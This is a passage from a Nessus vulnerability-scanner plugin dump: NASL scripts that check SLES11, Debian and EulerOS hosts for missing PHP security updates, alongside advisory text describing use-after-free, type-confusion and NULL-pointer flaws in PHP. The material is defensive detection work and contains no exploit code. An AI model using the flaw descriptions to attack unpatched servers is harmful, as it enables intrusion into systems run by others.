(rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-shmop-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-snmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-soap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-suhosin-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvmsg-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvsem-5.3.17-48.1\")) 
flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-sysvshm-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-tokenizer-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-wddx-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlreader-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlrpc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xmlwriter-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-xsl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zip-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"php53-zlib-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"apache2-mod_php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bcmath-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-bz2-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-calendar-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ctype-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-curl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dba-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-dom-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-exif-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fastcgi-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-fileinfo-5.3.17-48.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ftp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gd-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gettext-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-gmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-iconv-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-intl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-json-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-ldap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mbstring-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mcrypt-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-mysql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-odbc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-openssl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pcntl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pdo-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pear-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pgsql-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-pspell-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-shmop-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-snmp-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-soap-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", 
reference:\"php53-suhosin-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvmsg-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvsem-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-sysvshm-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-tokenizer-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-wddx-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlreader-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlrpc-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xmlwriter-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-xsl-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zip-5.3.17-48.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"php53-zlib-5.3.17-48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:21", "description": "- CVE-2015-6831 Use after free vulnerability was found in unserialize() function. We can create ZVAL and free it via Serializable::unserialize. However the unserialize() will still allow to use R: or r: to set references to that already freed memory. 
This use-after-free can be exploited to execute arbitrary code remotely.\n\n - CVE-2015-6832 Dangling pointer in the unserialization of ArrayObject items.\n\n - CVE-2015-6833 Files extracted from an archive may be placed outside of the destination directory.\n\n - CVE-2015-6834 A use-after-free vulnerability was found in the unserialize() function. A ZVAL can be created and then freed via Serializable::unserialize. However, unserialize() will still allow R: or r: to be used to set references to that already freed memory. This use-after-free can be exploited to execute arbitrary code remotely.\n\n - CVE-2015-6836 A type confusion occurs within SOAP serialize_function_call due to insufficient validation of the headers field. In the SoapClient's __call method, the verify_soap_headers_array check is applied only to headers retrieved from zend_parse_parameters; the problem is that a few lines later, soap_headers could be updated or even replaced with values from the __default_headers object fields.\n\n - CVE-2015-6837 The XSLTProcessor class misses a few checks on the input from the libxslt library. The valuePop() function call can return a NULL pointer, and PHP does not check for that.\n\n - CVE-2015-6838 The XSLTProcessor class misses a few checks on the input from the libxslt library. The valuePop() function call can return a NULL pointer, and PHP does not check for that.\n\n - CVE-2015-7803 A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash.\n\n - CVE-2015-7804 An uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name '/ZIP' could cause a PHP application function to crash.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-09T00:00:00", "type": "nessus", "title": "Debian DLA-341-1 : php5 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libapache2-mod-php5", "p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter", "p-cpe:/a:debian:debian_linux:php-pear", "p-cpe:/a:debian:debian_linux:php5", "p-cpe:/a:debian:debian_linux:php5-cgi", "p-cpe:/a:debian:debian_linux:php5-cli", "p-cpe:/a:debian:debian_linux:php5-common", "p-cpe:/a:debian:debian_linux:php5-curl", "p-cpe:/a:debian:debian_linux:php5-dbg", "p-cpe:/a:debian:debian_linux:php5-dev", "p-cpe:/a:debian:debian_linux:php5-enchant", "p-cpe:/a:debian:debian_linux:php5-gd", "p-cpe:/a:debian:debian_linux:php5-gmp", "p-cpe:/a:debian:debian_linux:php5-imap", "p-cpe:/a:debian:debian_linux:php5-interbase", "p-cpe:/a:debian:debian_linux:php5-intl", "p-cpe:/a:debian:debian_linux:php5-ldap", "p-cpe:/a:debian:debian_linux:php5-mcrypt", "p-cpe:/a:debian:debian_linux:php5-mysql", "p-cpe:/a:debian:debian_linux:php5-odbc", "p-cpe:/a:debian:debian_linux:php5-pgsql", "p-cpe:/a:debian:debian_linux:php5-pspell", "p-cpe:/a:debian:debian_linux:php5-recode", "p-cpe:/a:debian:debian_linux:php5-snmp", "p-cpe:/a:debian:debian_linux:php5-sqlite", "p-cpe:/a:debian:debian_linux:php5-sybase", "p-cpe:/a:debian:debian_linux:php5-tidy", "p-cpe:/a:debian:debian_linux:php5-xmlrpc", "p-cpe:/a:debian:debian_linux:php5-xsl", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-341.NASL", "href": "https://www.tenable.com/plugins/nessus/86794", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network 
Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-341-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86794);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6831\", \"CVE-2015-6832\", \"CVE-2015-6833\", \"CVE-2015-6834\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n\n script_name(english:\"Debian DLA-341-1 : php5 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - CVE-2015-6831 Use after free vulnerability was found in\n unserialize() function. We can create ZVAL and free it\n via Serializable::unserialize. However the unserialize()\n will still allow to use R: or r: to set references to\n that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code\n remotely.\n\n - CVE-2015-6832 Dangling pointer in the unserialization of\n ArrayObject items.\n\n - CVE-2015-6833 Files extracted from archive may be placed\n outside of destination directory\n\n - CVE-2015-6834 Use after free vulnerability was found in\n unserialize() function. We can create ZVAL and free it\n via Serializable::unserialize. However the unserialize()\n will still allow to use R: or r: to set references to\n that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code\n remotely.\n\n - CVE-2015-6836 A type confusion occurs within SOAP\n serialize_function_call due to an insufficient\n validation of the headers field. 
In the SoapClient's\n __call method, the verify_soap_headers_array check is\n applied only to headers retrieved from\n zend_parse_parameters; problem is that a few lines\n later, soap_headers could be updated or even replaced\n with values from the __default_headers object fields.\n\n - CVE-2015-6837 The XSLTProcessor class misses a few\n checks on the input from the libxslt library. The\n valuePop() function call is able to return NULL pointer\n and php does not check that.\n\n - CVE-2015-6838 The XSLTProcessor class misses a few\n checks on the input from the libxslt library. The\n valuePop() function call is able to return NULL pointer\n and php does not check that.\n\n - CVE-2015-7803 A NULL pointer dereference flaw was found\n in the way PHP's Phar extension parsed Phar archives. A\n specially crafted archive could cause PHP to crash.\n\n - CVE-2015-7804 An uninitialized pointer use flaw was\n found in the phar_make_dirstream() function of PHP's\n Phar extension. A specially crafted phar file in the ZIP\n format with a directory entry with a file name '/ZIP'\n could cause a PHP application function to crash.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/11/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/php5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libapache2-mod-php5filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-interbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2015/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php-pear\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cgi\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cli\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-common\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-curl\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dbg\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dev\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-enchant\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gd\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"php5-gmp\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-imap\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-interbase\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-intl\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-ldap\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mcrypt\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mysql\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-odbc\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pgsql\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pspell\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-recode\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-snmp\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sqlite\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sybase\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-tidy\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xmlrpc\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xsl\", reference:\"5.3.3.1-7+squeeze28\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T12:41:26", "description": "According to the versions of the php packages 
installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2014-8142)\n\n - It was found that certain PHP functions did not properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4026)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6834)\n\n - It was found that certain PHP functions did not properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-4025)\n\n - An integer overflow flaw was found in the way custom objects were unserialized. Specially crafted input processed by the unserialize() function could cause a PHP application to crash.(CVE-2014-3669)\n\n - It was found that PHP move_uploaded_file() function did not properly handle file names with a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.(CVE-2015-2348)\n\n - An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-4022)\n\n - A flaw was discovered in the way PHP performed object unserialization. 
Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6836)\n\n - A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed PHP functions to be used as XSLT functions within XSL stylesheets.(CVE-2015-6837)\n\n - It was found that PHP's gd extension did not properly handle file names with a null character. A remote attacker could possibly use this flaw to make a PHP application access unexpected files and bypass intended file system access restrictions.(CVE-2014-5120)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6835)\n\n - Stack consumption vulnerability in Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to cause a denial of service (segmentation fault) via recursive method calls.(CVE-2015-8873)\n\n - An uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application.(CVE-2015-0232)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-2787)\n\n - A buffer over-read flaw was found in PHP's phar (PHP Archive) paths implementation. 
A malicious script author could possibly use this flaw to disclose certain portions of server memory.(CVE-2015-2783)\n\n - A use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.(CVE-2015-0273)\n\n - Multiple buffer over-read flaws were found in the php_parserr() function of PHP. A malicious DNS server or a man-in-the-middle attacker could possibly use this flaw to crash a PHP application that used the dns_get_record() function to perform a DNS query.(CVE-2014-3597)\n\n - A buffer overflow flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-3329)\n\n - Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP before 5.4.42, 5.5.x before 5.5.26, and 5.6.x before 5.6.10 allows remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow.\n NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-4022.(CVE-2015-4643)\n\n - A type confusion issue was found in PHP's phpinfo() function. A malicious script author could possibly use this flaw to disclose certain portions of server memory.(CVE-2014-4721)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : php (EulerOS-SA-2019-1543)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3597", "CVE-2014-3669", "CVE-2014-4721", "CVE-2014-5120", "CVE-2014-8142", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3329", "CVE-2015-4022", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4643", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-8873"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1543.NASL", "href": "https://www.tenable.com/plugins/nessus/124996", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124996);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-3597\",\n \"CVE-2014-3669\",\n \"CVE-2014-4721\",\n \"CVE-2014-5120\",\n \"CVE-2014-8142\",\n \"CVE-2015-0232\",\n \"CVE-2015-0273\",\n \"CVE-2015-2348\",\n \"CVE-2015-2783\",\n \"CVE-2015-2787\",\n \"CVE-2015-3329\",\n \"CVE-2015-4022\",\n \"CVE-2015-4025\",\n \"CVE-2015-4026\",\n \"CVE-2015-4643\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-8873\"\n );\n script_bugtraq_id(\n 68423,\n 69322,\n 69375,\n 70611,\n 71791,\n 72541,\n 72701,\n 73431,\n 73434,\n 74239,\n 74240,\n 74902,\n 74904,\n 75056,\n 75291\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : php (EulerOS-SA-2019-1543)\");\n 
script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A flaws was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2014-8142)\n\n - It was found that certain PHP functions did not\n properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make\n a PHP script access unexpected files and bypass\n intended file system access\n restrictions.(CVE-2015-4026)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6834)\n\n - It was found that certain PHP functions did not\n properly handle file names containing a NULL character.\n A remote attacker could possibly use this flaw to make\n a PHP script access unexpected files and bypass\n intended file system access\n restrictions.(CVE-2015-4025)\n\n - An integer overflow flaw was found in the way custom\n objects were unserialized. Specially 